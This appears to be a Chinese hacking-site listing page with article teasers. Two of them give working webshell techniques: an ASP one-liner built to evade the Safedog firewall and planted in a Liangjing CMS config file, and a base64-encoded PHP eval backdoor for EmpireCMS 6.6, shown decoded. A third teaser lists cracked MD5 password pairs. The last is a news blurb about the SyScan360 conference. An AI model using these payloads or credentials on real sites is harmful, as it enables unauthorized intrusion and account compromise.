-
良精南方数据后台插一句话拿shell方法
良精后台网站配置插入过安全狗的一句话:”%><%Y=request(“hacker”)%> <%execute(Y)%><%’ 这一句话木马是过安全狗的有没有安全狗都能用,但在你不知道网站有没有安全狗的情况下最好就用这个,不然插入普通一句话后config.asp文件就被狗杀掉了,然后网站就挂了。 一句话木马位置:www.xxx.com/inc/config.asp,密码hacker,用中国菜刀...阅读全文阅读全文
-
帝国cms 6.6后台拿webshell方法
进入后台后点击自定义页面-增加自定义页面-随便写了qxz.php文件名,页面内容填写,<script language=”php”>echo base64_decode(“PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=”);</script> 如果内容直接添一句话或者php大马是没有用的,,因为他会生成qxz.php前先给你执行!! PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= 就是 <?php @eval($_POST[‘cmd...阅读全文
-
收集的一些破解过的MD5密文
d7c48f4093825b04 ming123 7333be214e2c7808 123,!! d9966c834441d3a1 huxiadmin 3b3516e7efa7015a fjjjzx2008 ce9f21a791429e49 dai_6407 d7932f6e0545e6b3 hj12310402!(*! e5e8fa1cf88b768a 194523102872 8c17e425c5506b7c 894370988@qq.com 369c820820a1a5f4 wangchanglei11 7f403dfbdc2a11d8 ad...阅读全文
-
SyScan360黑客破解大赛火爆 微软专家拔头筹
9月24日上午,由亚洲知名安全组织SyScan主办,中国领先安全厂商360承办的SyScan360国际顶级安全技术峰会在北京国家会议中心正式启动。来自微软、趋势科技等国际知名公司的安全专家与“越狱大神”Stefan Esser等多名优秀黑客齐聚现场,在大会正式开始前就开始过招儿,同参会者一起玩起了“SyScan360胸卡破解游戏”。 图1:SyScan360胸卡破解游戏现场 据悉,SyScan360大会的...阅读全文